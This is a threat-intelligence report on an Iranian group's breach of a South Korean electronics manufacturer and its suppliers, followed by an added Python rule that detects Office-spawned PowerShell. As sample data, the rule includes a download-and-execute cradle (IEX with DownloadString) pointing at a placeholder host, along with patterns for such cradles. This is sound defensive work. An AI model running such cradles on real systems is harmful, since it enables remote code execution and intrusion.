Iranian state-sponsored threat group MuddyWater — also tracked as Seedworm and Earth Vetala — maintained persistent access inside a major South Korean electronics manufacturer’s network for more than a week before detection, using the initial compromise as a pivot point to breach nine connected organisations in the target’s supplier and partner network. The campaign represents an escalation in MuddyWater’s Asian targeting beyond its traditional Middle East and Central Asia focus.
Campaign Detail
The initial intrusion used a spear-phishing campaign targeting the manufacturer’s procurement department — a typical MuddyWater initial access approach. The phishing lure mimicked a component tender from a known supplier, delivering a macro-enabled document that deployed a MuddyWater-associated PowerShell downloader. From the initial foothold on a procurement workstation, the group performed credential dumping to obtain service account credentials and moved laterally to domain controllers and the organisation’s supplier portal infrastructure.
The nine secondary organisations were compromised via VPN access using credentials stolen from the primary target’s partner access system — a tactic that exploits the trust inherent in B2B supplier connectivity. Symantec’s Threat Intelligence team detected the campaign after observing anomalous PowerShell execution patterns consistent with MuddyWater’s known POWERSTATS and BugSleep tooling.
Attribution
MuddyWater is assessed by multiple intelligence agencies — including CISA, NSA, and NCSC — as a subordinate element of Iran’s Ministry of Intelligence and Security (MOIS). Whilst the group has historically focused on telecommunications, government, and defence targets across the Middle East and Central Asia, this campaign reflects a broadening of targeting to East Asian technology and electronics manufacturers — likely aligned with Iran’s interest in semiconductor supply chains and dual-use technology acquisition.
The electronics manufacturer targeted holds patents and manufacturing processes related to memory chip production and display technologies. South Korean electronics firms have become an increasingly prominent target for state-sponsored industrial espionage.
Recommended Actions
- Supplier portal review: Organisations operating B2B supplier portals or partner VPN access should audit active sessions and credentials shared with suppliers. Rotate any credentials that cannot be attributed to active, named users.
- Living-off-the-land detection: MuddyWater’s lateral movement relies heavily on PowerShell, WMI, and legitimate remote management tools. Review PowerShell execution policies and enable Script Block Logging if not already active. Alert on PowerShell spawned from Office applications.
- Partner risk assessment: If your organisation maintains VPN or portal connectivity to electronics manufacturers or technology suppliers in the Asia-Pacific region, review whether anomalous access from those connections has occurred in the past 30 days.
- Phishing resilience: Procurement departments are a high-value target for initial access given their frequent receipt of external documents. Ensure macro execution is disabled by policy and that suspicious attachment delivery is logged and alerted.
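The living-off-the-land and phishing items above both come down to one detection: PowerShell started by an Office application, with extra weight for the command-line traits of a downloader. The following is an added example of that rule, not code from the original article or from Symantec. It assumes process-creation telemetry in Sysmon Event ID 1 shape (Image, ParentImage, CommandLine, User, Computer) and script text from PowerShell Script Block Logging (Event ID 4104); every event, host name, user and path in it is constructed sample data.

```python
"""Detection rule: PowerShell spawned from Office applications.

Added example, not part of the original article. Assumes Sysmon-style
process-creation records and 4104 script-block text; all sample data below
is constructed.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}

# Command-line and script-text traits typical of download-and-execute cradles.
# Each match adds SIGNAL_WEIGHT; an Office parent alone adds PARENT_WEIGHT.
SUSPICIOUS_PATTERNS = [
    ("no profile", re.compile(r"-nop\b")),
    ("hidden window", re.compile(r"-w(indowstyle)?\s+hidden")),
    ("encoded command", re.compile(r"-e(c|nc|ncoded|ncodedcommand)?\b")),
    ("execution policy bypass", re.compile(r"bypass")),
    ("web download", re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b")),
    ("dynamic evaluation", re.compile(r"\biex\b|invoke-expression")),
    ("webclient object", re.compile(r"net\.webclient")),
]
PARENT_WEIGHT = 70
SIGNAL_WEIGHT = 15


@dataclass
class ProcessEvent:
    computer: str
    user: str
    image: str
    parent_image: str
    command_line: str


def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def scan_text(text: str) -> list[str]:
    """Return the label of every suspicious pattern found in a command line
    or a 4104 script block (case-insensitive), in pattern order."""
    lowered = text.lower()
    return [label for label, pat in SUSPICIOUS_PATTERNS if pat.search(lowered)]


def score_event(ev: ProcessEvent) -> tuple[int, list[str]]:
    """Score one process-creation event from 0 to 100 with readable reasons.
    Non-PowerShell images are out of scope for this rule and score 0."""
    if basename(ev.image) not in POWERSHELL_IMAGES:
        return 0, []
    score, reasons = 0, []
    parent = basename(ev.parent_image)
    if parent in OFFICE_PARENTS:
        score += PARENT_WEIGHT
        reasons.append(f"PowerShell spawned by Office process {parent}")
    for label in scan_text(ev.command_line):
        score += SIGNAL_WEIGHT
        reasons.append(f"command line shows {label}")
    return min(score, 100), reasons


def detect(events, threshold: int = PARENT_WEIGHT) -> list[dict]:
    """Return an alert record for every event at or above the threshold.
    The default fires on any Office-spawned PowerShell, which is what the
    advisory recommends; raise it only if that is too noisy for a site."""
    alerts = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            alerts.append({"computer": ev.computer, "user": ev.user,
                           "score": score, "reasons": reasons})
    return alerts


# Constructed sample telemetry (placeholder hosts, users and paths).
SAMPLE_EVENTS = [
    # Word -> hidden, encoded PowerShell: the phishing-macro pattern.
    ProcessEvent("PROC-WS-07", r"CORP\jlee",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                 "powershell.exe -NoP -W Hidden -Enc SQBFAFgA"),
    # User-launched script from Explorer: benign, scores 0.
    ProcessEvent("OPS-WS-03", r"CORP\mkim",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"C:\Windows\explorer.exe",
                 r"powershell.exe -ExecutionPolicy RemoteSigned -File C:\Scripts\nightly-backup.ps1"),
    # Excel -> PowerShell with a plain command line: still alerts on parent alone.
    ProcessEvent("FIN-WS-12", r"CORP\spark",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
                 r"powershell.exe -File \\fs01\shared\refresh-pivot.ps1"),
    # Management agent with -ExecutionPolicy Bypass: one weak signal, below threshold.
    ProcessEvent("PROC-WS-07", "NT AUTHORITY\\SYSTEM",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"C:\Windows\System32\svchost.exe",
                 r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\ProgramData\rmm\inventory.ps1"),
    # Word -> cmd.exe: outside this rule's scope, scores 0.
    ProcessEvent("PROC-WS-09", r"CORP\hchoi", r"C:\Windows\System32\cmd.exe",
                 r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                 "cmd.exe /c dir"),
]

# Constructed 4104 script-block text (placeholder URL) to show scan_text on decoded script.
SAMPLE_SCRIPT_BLOCK = "IEX (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/stage')"

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert["computer"], alert["user"], alert["score"], "; ".join(alert["reasons"]))
    print("script block signals:", scan_text(SAMPLE_SCRIPT_BLOCK))
```

The parent-process check carries most of the weight on purpose: Office applications have almost no legitimate reason to start PowerShell, so that single relationship is a high-confidence alert on its own, while the command-line patterns only raise priority and also serve, through `scan_text`, for the decoded text that Script Block Logging captures when a downloader hides behind `-EncodedCommand`.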